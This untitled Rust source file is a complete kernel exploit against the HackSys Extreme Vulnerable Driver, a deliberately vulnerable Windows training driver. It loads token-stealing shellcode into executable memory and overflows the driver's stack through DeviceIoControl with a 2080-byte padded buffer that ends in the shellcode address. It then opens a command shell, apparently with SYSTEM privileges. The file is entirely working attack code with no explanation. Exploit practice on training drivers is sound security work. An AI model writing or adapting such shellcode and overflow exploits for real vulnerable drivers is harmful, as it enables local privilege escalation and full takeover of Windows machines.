Untitled

extern crate winapi;
use winapi::um::fileapi::CreateFileA;
use winapi::um::memoryapi::VirtualAlloc;
use winapi::um::ioapiset::DeviceIoControl;
use std::ptr::null_mut;
use std::ffi::CString;
use std::process::Command;

fn main() {
    let shellcode = b"\x60\x31\xc0\x64\x8b\x80\x24\x01\x00\x00\x8b\x40\x50\x89\xc1\xba\x04\x00\x00\x00\x8b\x80\xb8\x00\x00\x00\x2d\xb8\x00\x00\x00\x39\x90\xb4\x00\x00\x00\x75\xed\x8b\x90\xf8\x00\x00\x00\x89\x91\xf8\x00\x00\x00\x61\x31\xc0\x5d\xc2\x08\x00".as_ptr() as *mut u8;
    let refshell = &shellcode;
    let fd = unsafe {
        CreateFileA(CString::new("\\\\.\\HackSysExtremeVulnerableDriver").unwrap().as_ptr(), 0xC0000000, 0, null_mut(), 0x3, 0, null_mut())
    };
    let allc = unsafe {
        VirtualAlloc(null_mut(), 0x100, 0x3000, 0x40)
    };
    let _copying = unsafe {
        (allc as *mut u8).copy_from(*refshell, 58);
    };
    let mut data = Vec::new();
    data.extend(std::iter::repeat(b'A').take(2080));
    let num = allc as usize;
    let bytes = num.to_le_bytes();
    data.extend_from_slice(&bytes);
    let input = data.as_ptr();
    let length = data.len() as u32;
    let mut lpbytes = 0;
    let _contact = unsafe {
        DeviceIoControl(fd, 0x222003, input as *mut winapi::ctypes::c_void, length, null_mut(), 0,  &mut lpbytes, null_mut())
    };
    Command::new("cmd.exe").status().expect("failed :/");
}